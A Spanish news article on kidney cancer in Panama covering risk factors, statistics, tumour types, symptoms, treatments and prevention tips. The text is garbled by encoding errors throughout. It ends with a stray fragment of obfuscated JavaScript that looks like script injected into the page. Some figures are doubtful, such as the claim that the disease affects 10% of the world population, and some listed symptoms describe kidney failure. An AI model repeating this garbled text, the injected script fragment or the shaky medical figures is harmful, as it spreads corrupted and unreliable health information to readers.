Fumar y tomar ciertos analgAi??sicos durante mucho tiempo puede aumentar el riesgo de cA?ncer de riAi??A?n en los adultos en edades de 60 a 64 aAi??os y su prevalencia es mayor en hombres que en mujeres. Investigaciones cientAi??ficas han llegado a la conclusiA?n de que ciertos trastornos hereditarios pueden aumentar el riesgo de cA?ncer de riAi??A?n en niAi??os y adultos.

ai???El cA?ncer renal ha sido a travAi??s de la historia uno de los mA?s difAi??ciles de tratar, especialmente en aquellos pacientes con una enfermedad avanzada’, asegura Ruiz.

En PanamA?, segA?n datos del Instituto OncolA?gico Nacional (ION) para el aAi??o 2015 se registraron 43 pacientes con cA?ncer de riAi??A?n de los cuA?les la mayorAi??a eran hombres en edad adulta.

Mientras que estadAi??sticas de laAi??OrganizaciA?n Mundial de la Salud (OMS) resaltan que mA?s de 21 mil casos de cA?ncer de riAi??A?n son diagnosticados cada aAi??o en LatinoamAi??rica.

La doctora Leticia Ruiz, especialista en urologAi??a y trasplante renal, explica que actualmente la forma mA?s comA?n de cA?ncer renal son los carcinomas de cAi??lulas renales que causan aproximadamente el 85 % de los tumores en el riAi??A?n, afectando asAi?? el parAi??nquima renal. Agrega que el carcinoma de cAi??lulas claras es el mA?s frecuente en la poblaciA?n mundial.

Tipos de carcinomas y tratamientos

Ruiz agrega que hay otros tipos de carcinomas renales menos comunes como papilares, cromA?fobos, ductal, medular, tubular mucinoso y tumores uroteliales que se originan en la vAi??a urinaria de cAi??lulas transicionales que causan entre el diez y el 15% de los tumores renales.

ai???El sarcoma, linfoma o el tumor de Wilms es mA?s comA?n en niAi??os y son tumores raros (poco comunes). En PanamA? los mA?s comunes son los carcionomas de cAi??lulas claras’, detalla la urA?loga.

SegA?n Ruiz, en PanamA? hay disponibilidad de variados tratamientos para contrarrestar este mal que hoy ocupa el puesto nA?mero 13 de los diferentes tipos de cA?ncer en AmAi??rica Latina.

Enfermedad silenciosa

El cA?ncer renal se considera un asesino silencioso ya que sus sAi??ntomas se presentan cuando la enfermedad estA? avanzada.

Es una dolencia que afecta al 10% del poblaciA?n mundial, destaca la OMS, que a su vez seAi??ala que en lo que va del aAi??o 667 personas fueron diagnosticadas con este tipo de cA?ncer en CentroamAi??rica y RepA?blica Dominicana. Entre esos, 411 fueron detectados en hombres y 256 en mujeres.

Una de las seAi??ales mA?s frecuentes es cuando el individuo pierde la capacidad de manejar los lAi??quidos del organismo provocando hinchazA?n en los pies, sangre en la orina, dolor en el costado que no desaparece, cansancio, pAi??rdida de apetito y anemia.

Los tratamientos hoy disponibles en PanamA? estA?n desde la cirugAi??a tanto abierta como laparoscA?pica con o sin asistencia robA?tica.

SA?lo un 2% de los casos, el tumor aparece en ambos riAi??ones a la vez. Shutterstock

Ruiz detalla que la cirugAi??a robA?tica tiene su mayor aplicaciA?n en la nefrectomAi??a parcial que consiste en extirpar A?nicamente el tumor, preservando el resto del riAi??A?n.

TambiAi??n estA? disponible la inmunoterapia o terapia con citoquinas que combate el cA?ncer renal regulando las actividades de los glA?bulos blancos que son los responsables de la inmunidad.

AdemA?s los especialistas pueden optar por la terapia dirigida la cual funciona al interferir con el crecimiento y supervivencia del tumor.

Otras opciones para tratar el carcinoma avanzado estA? la radioterapia, quimioterapia, ablaciA?n por radiologAi??a intervencionista, terapia dirigida o terapia en blanco.

SegA?n Ruiz aproximadamente el 20% de los pacientes tienen una enfermedad metastA?sica desde el diagnA?stico.

Recomendaciones A?tiles

Entre los cuidados a tomar en cuenta estA? hacer ejercicio cardiovascular mA?s ejercicios de resistencia como las pesas (150 minutos a la semana), dieta baja en azA?car o carbohidratos simples, menos sal y menos grasas saturadas, no fumar, mantener el peso ideal segA?n la talla, realizar controles mAi??dicos por lo menos una vez al aAi??o, evaluar la presiA?n arterial, circunferencia abdominal y laboratorios como creatinina, glucemia y urinA?lisis. Es muy importante que ante cualquier sAi??ntoma debe acudir a su mAi??dico de cabecera.

_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}